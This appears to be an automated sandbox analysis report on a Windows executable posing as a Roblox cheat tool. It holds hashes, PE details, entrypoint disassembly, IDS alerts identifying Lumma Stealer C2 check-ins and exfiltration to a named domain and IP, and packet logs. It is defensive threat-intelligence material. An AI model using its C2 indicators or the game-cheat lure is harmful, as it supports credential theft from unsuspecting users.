Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Solara-Roblox-Executor-v3.exe

Simulations

Behavior and APIs

Time	Type	Description
11:23:07	API Interceptor	8x Sleep call for process: Solara-Roblox-Executor-v3.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
s-part-0017.t-0009.t-msedge.net	over.ps1	Get hash	malicious	Vidar	Browse	13.107.246.45
	http://knoxoms.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	ds1bfe33xg.exe	Get hash	malicious	RedLine	Browse	13.107.246.45
	u233hvgTow.exe	Get hash	malicious	RedLine	Browse	13.107.246.45
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.52.90
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.97.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	104.21.24.64
	over.ps1	Get hash	malicious	Vidar	Browse	172.64.41.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	172.67.217.81
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	http://knoxoms.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.48.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.96.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	PO#5_tower_Dec162024.cmd	Get hash	malicious	DBatLoader	Browse	104.21.96.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.820425867551472
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Solara-Roblox-Executor-v3.exe
File size:	814'592 bytes
MD5:	d2b09b1bda10143724a24534e31d44db
SHA1:	6838edf7603b3a2be8195f5029223c808cdde9a4
SHA256:	0336d6c3b8629f426c417a0999b65f74e804d11b28412482d72a004a9c6019a1
SHA512:	0274d0ac02d12c5a71d1b03e38be8a1ce6c3b2bd4553f96f3225cd68ef25f8097e22ec516b06d72d9cdafc20dbaed4424a52e9b1abb2eec7a9f7ee5a3c86f4d8
SSDEEP:	24576:FK1PSMZAM9AlqJkztYouKM9AlqJkztYoub:A1PS4AM9WqJTKM9WqJTb
TLSH:	2905021134C08072D9B7357B19F9D7B6563EE9200F12AADF5B880F7A8F361C19B7462A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40a2e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	019ac8c6e24f80fb88de699b6749f599

Entrypoint Preview

Instruction
call 00007F01787E026Ah
jmp 00007F01787E00CDh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F01787E0266h
test esi, ecx
jne 00007F01787E0288h
call 00007F01787E0291h
mov ecx, eax
cmp ecx, edi
jne 00007F01787E0269h
mov ecx, BB40E64Fh
jmp 00007F01787E0270h
test esi, ecx
jne 00007F01787E026Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8D8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E894h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E890h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E920h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8F8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6c4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1b90	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e834	0x148	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x247da	0x24800	ba0610d1e4ecb6f5f64959d9eb5b455a	False	0.5549951840753424	data	6.559506263512015	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9eb4	0xa000	53eba87ddc7d2455b0ac2836680b1660	False	0.428271484375	DOS executable (COM)	4.9181666163124085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2280	0x1600	112d0c9e43893ae5b7f96d23807996ac	False	0.39506392045454547	data	4.581141173428789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1b90	0x1c00	3080b38ba0e27b64b3ab5ca0f93c1c7c	False	0.7785993303571429	data	6.532705218372571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x4a400	0x4a400	f0bfd66820f6bd7ba7131c8790d125ce	False	1.0003320970117846	data	7.999394684755566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x82000	0x4a400	0x4a400	f0bfd66820f6bd7ba7131c8790d125ce	False	1.0003320970117846	data	7.999394684755566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T17:23:06.437136+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.5	57343	1.1.1.1	53	UDP
2024-12-31T17:23:06.923281+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:06.923281+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:07.532015+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:07.532015+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.96.1	443	TCP
2024-12-31T17:23:08.463581+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:08.463581+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:08.907058+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:08.907058+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.96.1	443	TCP
2024-12-31T17:23:09.664220+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49706	104.21.96.1	443	TCP
2024-12-31T17:23:09.664220+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.96.1	443	TCP
2024-12-31T17:23:10.741890+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49707	104.21.96.1	443	TCP
2024-12-31T17:23:10.741890+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.96.1	443	TCP
2024-12-31T17:23:12.278928+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49708	104.21.96.1	443	TCP
2024-12-31T17:23:12.278928+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.96.1	443	TCP
2024-12-31T17:23:13.856635+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49709	104.21.96.1	443	TCP
2024-12-31T17:23:13.856635+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.96.1	443	TCP
2024-12-31T17:23:14.427599+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	104.21.96.1	443	TCP
2024-12-31T17:23:15.337203+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49710	104.21.96.1	443	TCP
2024-12-31T17:23:15.337203+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	104.21.96.1	443	TCP
2024-12-31T17:23:18.415376+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49711	104.21.96.1	443	TCP
2024-12-31T17:23:18.415376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49711	104.21.96.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:23:06.457516909 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:06.457534075 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:06.457617044 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:06.458987951 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:06.458995104 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:06.923199892 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:06.923280954 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:06.929646015 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:06.929653883 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:06.929847002 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:06.977802038 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.111864090 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.111888885 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.111979008 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:07.532030106 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:07.532140970 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:07.532197952 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.559921026 CET	49704	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.559941053 CET	443	49704	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:07.849612951 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.849638939 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:07.849713087 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.850034952 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:07.850052118 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.463354111 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.463581085 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.465022087 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.465035915 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.465291023 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.466490984 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.466521978 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.466557980 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907066107 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907126904 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907155037 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907180071 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.907195091 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907206059 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907358885 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.907373905 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907421112 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.907675028 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907741070 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.907785892 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.907793045 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.908253908 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.908287048 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.908304930 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.908313990 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.908360004 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.911674023 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.962137938 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.995542049 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995635033 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995666027 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995692968 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.995702982 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995744944 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.995750904 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995786905 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.995831013 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.996834993 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.996850967 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:08.996862888 CET	49705	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:08.996866941 CET	443	49705	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.190922976 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.190962076 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.191030025 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.191288948 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.191297054 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.664005995 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.664220095 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.665476084 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.665481091 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.665712118 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:09.666884899 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.667011976 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:09.667037010 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.168680906 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.168797016 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.168966055 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.169003963 CET	49706	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.169018030 CET	443	49706	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.285511971 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.285577059 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.285657883 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.285933971 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.285952091 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.741821051 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.741889954 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.768934965 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.768951893 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.769215107 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.814692020 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.814912081 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.814946890 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:10.815006971 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:10.815013885 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:11.637209892 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:11.637317896 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:11.637376070 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:11.637482882 CET	49707	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:11.637506008 CET	443	49707	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:11.819955111 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:11.819994926 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:11.820067883 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:11.820446014 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:11.820462942 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.278779984 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.278928041 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.279979944 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.279992104 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.280194998 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.281213999 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.281348944 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.281380892 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.281455994 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.281466007 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.890795946 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.890902996 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:12.890990973 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.893824100 CET	49708	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:12.893845081 CET	443	49708	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.388387918 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.388418913 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.388530016 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.388819933 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.388832092 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.856425047 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.856635094 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.970096111 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.970114946 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.970323086 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:13.971477985 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.971574068 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:13.971580982 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:14.427613020 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:14.427712917 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:14.427809000 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:14.428220034 CET	49709	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:14.428236008 CET	443	49709	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:14.868647099 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:14.868697882 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:14.868782043 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:14.869168043 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:14.869184971 CET	443	49710	104.21.96.1	192.168.2.5
